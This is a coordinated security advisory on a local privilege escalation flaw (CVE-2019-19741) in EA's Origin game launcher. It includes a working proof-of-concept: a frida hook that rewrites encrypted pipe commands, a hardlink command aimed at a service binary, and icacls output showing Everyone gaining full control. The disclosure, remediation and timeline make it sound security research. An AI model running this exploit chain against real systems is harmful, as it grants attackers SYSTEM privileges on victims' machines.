EA Origin 10.5.55.33574 CreateDirectory arbitrary DACL write privilege escalation (CVE-2019–19741)

Summary

Electronic Arts’ game launcher Origin is vulnerable to local privilege escalation due to arbitrary file/directory DACL manipulation. This vulnerability was discovered by reverse engineering the named pipe communication protocol between GUI application and the service running as SYSTEM. In order to trigger the vulnerability, the pipe encryption was bypassed. In order to upgrade limited DACL write to arbitrary DACL write, a blacklist filter was evaded. In this approach, the well known “hardlink technique” was therefore used.

Vendor: Electronic Arts
Product: Origin
Tested Version: 10.5.55.33574
Fixed Version: 10.5.56.33908 (with restricted access mode enabled)
CVSSv3: AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H (7.8)
CVSSv2: AV:L/AC:L/Au:S/C:C/I:C/A:C (6.8)
CVE Reference: CVE-2019–19741
CWE Reference: CWE-284: Improper Access Control

Introduction

The Origin game launcher application uses the OriginClientService.exe (run as SYSTEM) and the Origin.exe process which is run in an unprivileged user context. While the user process manages the user interface, the service manages actions that require elevated privileges such as registry modifications in HKEY_LOCAL_MACHINE, launching game installer applications and adjusting filesystem DACLs. To trigger these elevated actions, Origin.exe transmits specific commands over the named pipe OriginClientService which are received and processed by the service subsequently.

Root Cause Analysis

The vulnerability chain which is required to exploit this issue consists of three different, separate vulnerabilities and security architecture misconceptions.

Insufficient named pipe client verification (0x01)

When Origin.exe connects to the named pipe OriginClientService, the privileged service verifies the client’s executable file instead of its in-memory process (which can be significantly different from the executable file due to DLL injection e.g.). This can be seen in the service logs (snippets):

ServiceQtThread 10372 EscalationServiceWin Starting…
Origin::Escalation::IPCServer::IPCServer 10372 LocalSocket listening on pipe: OriginClientService
Origin::Escalation::IEscalationService::IEscalationService 10372 Found escalation args.
Origin::Escalation::IEscalationService::IEscalationService 10372 Successfully determined caller process ID: 8252
Origin::Services::CryptoService::isValidEACertificate 10372 The file has a valid EA certificate: C:\Program Files (x86)\Origin\Origin.exe
Origin::Escalation::EscalationServiceWin::validateCaller 10372 Successfully validated caller PID: 8252 Path: C:\Program Files (x86)\Origin\Origin.exe

Internally, the executable file name is determined via GetModuleFileNameEx() and verified via WinVerifyTrust()which is insufficient since the run time process can be significantly different from the executable file and may be modified in-memory. This can be easily achieved by e.g. DLL injection (which requires no additional privileges).

Note: As GetModuleFileNameEx()uses the target process’ PEB->Ldr->InMemoryOrderModuleList, any process may connect successfully to the pipe by altering its PEB.

Named pipe communication obfuscation bypass (0x02)

Data being transmitted over the pipe OriginClientService is encrypted using a static key. Instead of hooking the pipe communication directly via WriteFileEx(), this can be bypassed by hooking the EVP_EncryptUpdate() function of libeay32.dll.

Incomplete mitigations in CreateDirectory component (0x03)

The pipe takes the command CreateDirectoryto create a directory and adjust the directory DACL. Calls to this function can be intercepted, the directory and the DACL can be replaced and the manipulated DACL is written on the file or directory. Some files and directories are blacklisted and must be avoided. Alternatively, the blacklist filter might be evaded by using / instead of \.

Proof-of-Concept

Exploiting the vulnerabilities can be done by injecting frida-trace into the Origin.exe process (bypassing 0x01) and hooking OpenSSL’s EVP_EncryptUpdate() in order to modify commands being transmitted from Origin.exe to the service (bypassing 0x02). This is necessary as the pipe communication is encrypted.

Setting up frida-trace and adjusting the hook functionality in \__handlers__\LIBEAY32.dll\:

onEnter: function (log, args, state) {
    log(‘EVP_EncryptUpdate() ‘ + args[4] + ‘ ‘ + Memory.readCString(args[3]));
    var orig = Memory.readCString(args[3]);
    if(orig.includes(“CreateDirectory”)) {
        var buf = Memory.allocAnsiString(“CreateDirectory\nC://Users/Tobias/test\nD:(A;OICI;GA;;;WD)\n\n”);
        this.buf = buf;
        args[3] = buf;
        args[4] = 58;
        log(“Replaced with: “ + Memory.readCString(args[3]));
    }
},

Start frida-trace using: frida-trace -I "ssleay32.dll" -i "EVP_EncryptUpdate" <pid>

The exploit is triggered by uninstalling and reinstalling a game in the Origin GUI (which fails). However, the destination filenames and directory names are filtered (e.g. C:\Windows\system32 is blacklisted).

Arbitrary DACL write is further achieved by creating a hardlink in a user-controlled directory that points to e.g. a service binary. The DACL is now being written to this service binary which results in privilege escalation. Note that the hardlink technique is not required for files and directories that are not affected by the blacklist or the blacklist can be bypassed successfully.

Creating a hardlink:

CreateHardlink.exe "C:\Users\Tobias\test" "C:\Program Files (x86)\Origin\OriginWebHelperService.exe"

Checking access control pre-exploitation:

C:\WINDOWS\system32>icacls.exe “C:\Program Files (x86)\Origin\OriginWebHelperService.exe”
C:\Program Files (x86)\Origin\OriginWebHelperService.exe NT-AUTORITÄT\SYSTEM:(I)(F)
VORDEFINIERT\Administratoren:(I)(F)
VORDEFINIERT\Benutzer:(I)(RX)
ZERTIFIZIERUNGSSTELLE FÜR ANWENDUNGSPAKETE\ALLE ANWENDUNGSPAKETE:(I)(RX)
ZERTIFIZIERUNGSSTELLE FÜR ANWENDUNGSPAKETE\ALLE EINGESCHRÄNKTEN ANWENDUNGSPAKETE:(I)(RX)
1 Dateien erfolgreich verarbeitet, bei 0 Dateien ist ein Verarbeitungsfehler aufgetreten.

Access control after exploitation (Everyone has full access now):

C:\WINDOWS\system32>icacls.exe “C:\Program Files (x86)\Origin\OriginWebHelperService.exe”
C:\Program Files (x86)\Origin\OriginWebHelperService.exe Jeder:(F)
1 Dateien erfolgreich verarbeitet, bei 0 Dateien ist ein Verarbeitungsfehler aufgetreten.

Note: While this technique requires the user to somehow cause Origin.exe to send a CreateDirectory command through the named pipe, an alternative approach would be to implement a specially crafted client application or injecting a DLL which triggers the vulnerability instantly after being loaded. In these cases, user interaction is not necessary for successful exploitation.

Remediation and vendor statement

Origin 10.5.56.33908 introduces the Restricted Access Mode which disables the execution of privileged operations by unprivileged users completely and therefore remediates this vulnerability. This mode is disabled in default installations meaning both version 10.5.56.33908 (or greater) must be installed and restricted access mode must be enabled independently to remediate this issue.

EA provides the following statement commenting on the vulnerability fix:

“Our goal with the publication of the advisory and corresponding blog post was to both address the underlying vulnerability and to provide transparency and insight into our approach in protecting Origin users. Ultimately we believe a doing this enables Administrators to make and an informed decision based on their risk profile. The vast majority of our current Origin users already have Administrator-level access and are the only user account on the machine (the number of users without Administrator-level access is less than 5% of our total Origin user base). This makes using the vulnerability unlikely across most users as it would not result in any further access or privileges.”

Disclosure timeline

2019-11-03: Issue discovered
2019-11-23: PoC development
2019-12-10: EA released v10.5.56.33908 and EASEC-2019-001 advisory addressing the architecture flaw affecting CVE-2019-19741, CVE-2019-19247 and CVE-2019-19248.
2019-12-12: CVE assignment
2019-12-16: Vendor contacted
2019-12-16: First response, vendor investigates issue
2019-12-19: Vendor confirms vulnerability
2019-12-27: Advisory draft
2020-02-16: Advisory disclosure (with vendor approval)

Note: The overall disclosure experience was professional and very pleasant.

References

Advisory EASEC-2019–001: https://www.ea.com/security/news/easec-2019-001-elevation-of-privilege-vulnerability-in-origin-client

EA Security Update: https://www.ea.com/security/news/origin-security-update-in-collaboration-with-external-security-researchers

Restricted Access Mode Help Article: https://help.ea.com/en/help/origin/origin/enable-restricted-access-mode-in-origin/

DACL writes to arbitrary files using hardlinks (by James Forshaw, Google Project Zero): https://googleprojectzero.blogspot.com/2015/12/between-rock-and-hard-link.html

CreateHardlink.exe (by James Forshaw, Google Project Zero): https://github.com/googleprojectzero/symboliclink-testing-tools

CVE-2019–19248 (discovered by Matt Nelson and Vasily Kravetz): https://enigma0x3.net/2019/12/10/cve-2019-19248-local-privilege-escalation-in-eas-origin-client/

CVE-2019–19247 (discovered by Vasily Kravetz): https://amonitoring.ru/article/origin_lpe_disclosure/

Disclaimer

The information provided in this security advisory is provided “as is” and without warranty of any kind. Details of this security advisory may be updated in order to provide as accurate information as possible.